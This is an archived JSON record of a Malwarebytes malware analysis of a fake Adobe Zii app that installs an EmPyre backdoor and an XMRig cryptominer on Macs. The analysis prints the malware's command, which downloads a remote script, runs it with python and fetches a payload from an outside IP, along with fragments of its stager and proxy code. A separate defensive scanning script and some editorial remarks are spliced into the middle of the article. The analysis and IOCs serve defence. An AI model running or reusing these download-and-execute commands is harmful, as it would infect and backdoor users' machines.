{
	"id": "176d48fb-2179-43ae-b7a5-6f9f6037d34f",
	"created_at": "2026-04-06T00:15:16.463551Z",
	"updated_at": "2026-04-10T03:20:18.744539Z",
	"deleted_at": null,
	"sha1_hash": "b8d2e5c3c8e06dc2aae0343bde947ce9a84f826b",
	"title": "Mac malware combines EmPyre backdoor and XMRig miner",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 84704,
	"plain_text": "Mac malware combines EmPyre backdoor and XMRig miner\r\nBy Thomas Reed\r\nPublished: 2018-12-06 · Archived: 2026-04-05 23:36:16 UTC\r\nEarlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—\r\nthe EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.\r\nThe malware was being distributed through an application named Adobe Zii. Adobe Zii is software that is\r\ndesigned to aid in the piracy of a variety of Adobe applications. In this case, however, the app was called Adobe\r\nZii, but it was definitely not the real thing.\r\nAs can be seen from the above screenshots, the actual Adobe Zii software, on the left, uses the Adobe Creative\r\nCloud logo. (After all, if you’re going to write software to help people steal Adobe software, why not steal the\r\nlogo, too?) The malware installer, however, uses a generic Automator applet icon.\r\nBehavior\r\nOpening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script:\r\ncurl https://ptpb.pw/jj9a | python - \u0026 s=46.226.108.171:80; curl $s/sample.zip -o sample.zip; unzip s\r\nThis script is designed to download and execute a Python script, then download and run an app named\r\nsample.app.\r\nThe sample.app is simple. It appears to simply be a version of Adobe Zii, most likely for the purpose of making it\r\nappear that the malware was actually “legitimate.” (This is not to imply that software piracy is legitimate, of\r\ncourse, but rather it means that the malware was attempting to look like it was doing what the user thought it was\r\nintended to do.)\r\nWhat about the Python script? 
That turned out to be obfuscated, but was easily deobfuscated, revealing the\r\nfollowing script (only its opening line survives in this copy):\r\nimport sys;import re, subprocess;cmd = \"ps -ef | grep Little Snitch | grep -v grep\" ps = subprocess.P\r\nThe first thing this script does is look for a running Little Snitch process. Little Snitch is a commonly used outgoing firewall that\r\nwould be capable of bringing the backdoor’s network connection to the attention of the user. If Little Snitch is\r\npresent, the malware bails out. (Of course, if an outgoing firewall like Little Snitch were installed, it would\r\nalready have prompted about, or blocked, the curl connection that downloaded this script, so checking at this point is\r\nworthless.) Note also that, as printed, grep Little Snitch passes Snitch as a file name rather than as part of the pattern; unless the\r\noriginal had quoting that this copy lost, that pipeline never reads the ps output and the check fails open.\r\nThis script opens up a connection to an EmPyre backend, which is capable of pushing arbitrary commands to the\r\ninfected Mac. Once the backdoor is open, it receives a command that downloads the following script to\r\n/private/tmp/uploadminer.sh and executes it. Only the first line survives here; it begins with #, so it is commented out, and it\r\nwould point the Wi-Fi HTTPS proxy at 46.226.108.171:8080, which fits the inactive traffic-interception code described below:\r\n# osascript -e \"do shell script \"networksetup -setsecurewebproxy \"Wi-Fi\" 46.226.108.171 8080 \u0026\u0026 netwo\r\nThis script downloads and installs the other components of the malware. A launch agent named\r\ncom.proxy.initialize.plist is created to keep the backdoor open persistently by running exactly the same\r\nobfuscated Python script mentioned previously. (A launch agent is loaded at every login, so the backdoor survives reboots.)\r\nThe script also downloads the XMRig cryptominer and a config file into the /Users/Shared/ folder, and sets up a\r\nlaunch agent named com.apple.rig.plist to keep the XMRig process running with that configuration active. 
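A scan for the persistence artifacts just described, added here as an example (it is not code from the Malwarebytes analysis, nor from the malware): it looks for the two launch agents, the XMRig drop in /Users/Shared/, and the uploadminer.sh stager, and builds a constructed sample tree so it can be exercised offline. The heuristic on unfamiliar agents that run inline python or anything out of /Users/Shared, and the check that a config.json carries XMRig’s top-level pools list, are this example’s own assumptions rather than details from the post.

```python
# Added example, not code from the Malwarebytes post: an offline check for the
# persistence artifacts the analysis describes. Launch agent names and drop
# paths are the ones the post reports; the command heuristics and the sample
# tree are this example's own assumptions.
import json
import os
import plistlib
import tempfile

# Launch agents the post reports, with what each one does.
KNOWN_AGENTS = {
    'com.apple.rig.plist': 'keeps the XMRig miner running',
    'com.proxy.initialize.plist': 're-runs the obfuscated EmPyre stager',
}
# Apple does not install agents under a user's ~/Library/LaunchAgents, so any
# com.apple.* name there is the red flag the post mentions.
APPLE_PREFIX = 'com.apple.'
UPLOADMINER = 'uploadminer.sh'   # installer the backdoor wrote to /private/tmp


def agent_command(plist_path):
    # Return the command line a launch agent runs, or None if unreadable.
    try:
        with open(plist_path, 'rb') as fh:
            data = plistlib.load(fh)
        args = data.get('ProgramArguments') or [data.get('Program')]
    except (OSError, plistlib.InvalidFileException, ValueError, AttributeError):
        return None
    return ' '.join(str(a) for a in args if a)


def is_xmrig_config(path):
    # Assumption: XMRig configs are JSON with a top-level pools list.
    try:
        with open(path, 'r') as fh:
            return isinstance(json.load(fh).get('pools'), list)
    except (OSError, ValueError, AttributeError):
        return False


def scan(launch_agents_dir, shared_dir, tmp_dir):
    # Return (severity, detail) findings; an empty list means nothing matched.
    findings = []
    if os.path.isdir(launch_agents_dir):
        for name in sorted(os.listdir(launch_agents_dir)):
            path = os.path.join(launch_agents_dir, name)
            cmd = agent_command(path) or ''
            if name in KNOWN_AGENTS:
                findings.append(('high', f'{path}: {KNOWN_AGENTS[name]}'))
            elif name.startswith(APPLE_PREFIX):
                findings.append(('medium', f'{path}: com.apple name in a user LaunchAgents folder'))
            # Heuristic (assumption): an agent under a new name that runs inline
            # python or anything out of /Users/Shared still deserves a look.
            elif '/Users/Shared/' in cmd or 'python -c' in cmd:
                findings.append(('medium', f'{path}: suspicious command {cmd}'))
    if os.path.isdir(shared_dir):
        for name in sorted(os.listdir(shared_dir)):
            path = os.path.join(shared_dir, name)
            if 'xmrig' in name.lower():
                findings.append(('high', f'{path}: XMRig binary in the shared folder'))
            elif name == 'config.json' and is_xmrig_config(path):
                findings.append(('high', f'{path}: miner config (pools list present)'))
    stager = os.path.join(tmp_dir, UPLOADMINER)
    if os.path.isfile(stager):
        findings.append(('high', f'{stager}: installer script dropped by the backdoor'))
    return findings


def build_sample_tree():
    # Constructed sample input (not real malware files): a tree laid out the
    # way the post describes the infection, so the scan can run offline.
    root = tempfile.mkdtemp(prefix='darthminer-demo-')
    agents = os.path.join(root, 'LaunchAgents')
    shared = os.path.join(root, 'Shared')
    tmp = os.path.join(root, 'tmp')
    for d in (agents, shared, tmp):
        os.makedirs(d)
    with open(os.path.join(agents, 'com.apple.rig.plist'), 'wb') as fh:
        plistlib.dump({'Label': 'com.apple.rig', 'RunAtLoad': True, 'KeepAlive': True,
                       'ProgramArguments': ['/Users/Shared/xmrig', '-c', '/Users/Shared/config.json']}, fh)
    with open(os.path.join(agents, 'com.proxy.initialize.plist'), 'wb') as fh:
        plistlib.dump({'Label': 'com.proxy.initialize', 'RunAtLoad': True,
                       'ProgramArguments': ['python', '-c', 'print(1)']}, fh)
    with open(os.path.join(agents, 'com.example.benign.plist'), 'wb') as fh:
        plistlib.dump({'Label': 'com.example.benign', 'ProgramArguments': ['/usr/bin/true']}, fh)
    with open(os.path.join(shared, 'config.json'), 'w') as fh:
        json.dump({'autosave': True, 'pools': [{'url': 'pool.example:3333'}]}, fh)
    open(os.path.join(shared, 'xmrig'), 'wb').close()
    open(os.path.join(tmp, UPLOADMINER), 'w').close()
    return agents, shared, tmp


if __name__ == '__main__':
    # On a live Mac the call would be scan(os.path.expanduser('~/Library/LaunchAgents'),
    # '/Users/Shared', '/private/tmp'); here the constructed tree is scanned instead.
    for severity, detail in scan(*build_sample_tree()):
        print(severity.upper(), detail)
```

Against the sample tree the scan reports all five artifacts as high-severity findings and says nothing about the benign agent; on a real host, the medium-severity heuristics are the ones to review by hand, since a legitimate tool can also keep files in /Users/Shared.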
(The\r\n“com.apple” name is an immediate red flag that was the root cause of the discovery of this malware.)\r\nInterestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy\r\nsoftware, which is software capable of intercepting all web traffic, including (with the aid of the certificate)\r\nencrypted “https” traffic. However, that code was commented out, indicating it was not active.\r\nOn the surface, this malware appears to be fairly harmless. Cryptominers typically only cause the computer to\r\nslow down, thanks to a process that sucks up all the CPU/GPU.\r\nHowever, this is not just a cryptominer. It’s important to keep in mind that the cryptominer was installed through a\r\ncommand issued by the backdoor, and there may very well have been other arbitrary commands sent to infected\r\nMacs by the backdoor in the past. It’s impossible to know exactly what damage this malware might have done to\r\ninfected systems. Just because we have only observed the mining behavior does not mean it hasn’t ever done other\r\nthings.\r\nImplications\r\nMalwarebytes for Mac detects this malware as OSX.DarthMiner. If you’re infected, it’s impossible to say what\r\nelse the malware may have done besides cryptomining. It’s entirely possible it could have exfiltrated files or\r\ncaptured passwords.\r\nThere’s an important lesson to learn from this. Software piracy is known to be one of the riskiest activities you can\r\nundertake on your Mac. The danger of infection is high, and this is not new, yet people still engage in this\r\nbehavior. Please, in the future, do yourself a favor and don’t pirate software. 
The costs can be far higher than\r\npurchasing the software you’re trying to get for free.\r\nIOCs\r\nAdobe Zii.app.zip SHA256:\r\nebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e\r\nAlso referenced in the analysis above: 46.226.108.171 (download host on port 80; proxy target on port 8080 in the commented-out code),\r\nhttps://ptpb.pw/jj9a (Python stager), /private/tmp/uploadminer.sh, XMRig and its config file under /Users/Shared/, and the launch agents\r\ncom.proxy.initialize.plist and com.apple.rig.plist.\r\nAbout the author\r\nHad a Mac before it was cool to have Macs. Self-trained Apple security expert. Amateur photographer.\r\nSource: https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/"
	],
	"report_names": [
		"mac-malware-combines-empyre-backdoor-and-xmrig-miner"
	],
	"threat_actors": [],
	"ts_created_at": 1775434516,
	"ts_updated_at": 1775791218,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b8d2e5c3c8e06dc2aae0343bde947ce9a84f826b.pdf",
		"text": "https://archive.orkl.eu/b8d2e5c3c8e06dc2aae0343bde947ce9a84f826b.txt",
		"img": "https://archive.orkl.eu/b8d2e5c3c8e06dc2aae0343bde947ce9a84f826b.jpg"
	}
}